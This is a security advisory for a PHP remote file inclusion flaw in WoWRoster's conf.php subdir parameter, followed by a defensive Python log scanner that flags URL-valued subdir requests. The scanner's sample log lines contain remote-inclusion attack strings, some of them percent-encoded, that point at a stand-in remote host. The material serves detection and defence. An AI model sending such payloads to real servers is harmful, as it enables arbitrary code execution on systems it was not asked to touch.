WoW.Roster.subdir.Parameter.Handling.File

Description

PHP remote file inclusion vulnerability in conf.php in WoWRoster (aka World of Warcraft Roster) 1.5.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the subdir parameter.

Affected Products

WoW Roster WoW Roster 1.5.1
WoW Roster WoW Roster 1.5

Impact

Arbitrary PHP code execution

Recommended Actions

Currently we are not aware of any official vendor-supplied patches for these issues.
WoWRoster Web site: http://www.wowroster.net/.
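
With no vendor patch listed, reviewing web server access logs for requests that match the description above is one practical check. The following is an added example, not part of the original advisory or of WoWRoster: it flags requests to conf.php whose subdir value looks like a URL. The combined log format, the /roster/ install path, and every sample line are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# RFC 3986 "scheme://" prefix, or a scheme-relative "//host" value.
URL_LIKE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

def fully_decode(value, rounds=3):
    """Undo layered percent-encoding, bounded so input cannot loop us."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_rfi_attempt(log_line):
    """True when the request targets conf.php with a URL-like subdir value."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    target = urlsplit(m.group(1))
    if not fully_decode(target.path).lower().endswith("/conf.php"):
        return False
    # parse_qs already decodes once; fully_decode removes any further layers.
    values = parse_qs(target.query, keep_blank_values=True).get("subdir", [])
    return any(URL_LIKE.match(fully_decode(v)) for v in values)

def scan(lines):
    """Return the indexes of log lines that should be reviewed."""
    return [i for i, line in enumerate(lines) if is_rfi_attempt(line)]

# Constructed sample lines (documentation addresses and .example hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /roster/conf.php?subdir=http://remote.example/a.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /roster/conf.php?subdir=HtTp%3A%2F%2Fremote.example%2Fa HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /roster/conf.php?subdir=%2568ttp%253A%252F%252Fremote.example%252Fa HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /roster/conf.php?subdir=addons/ HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:01:05 +0000] "GET /roster/index.php?page=http://remote.example/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print("review:", SAMPLE_LOG[i])
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.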

Coverage

IPS (Regular DB)
IPS (Extended DB)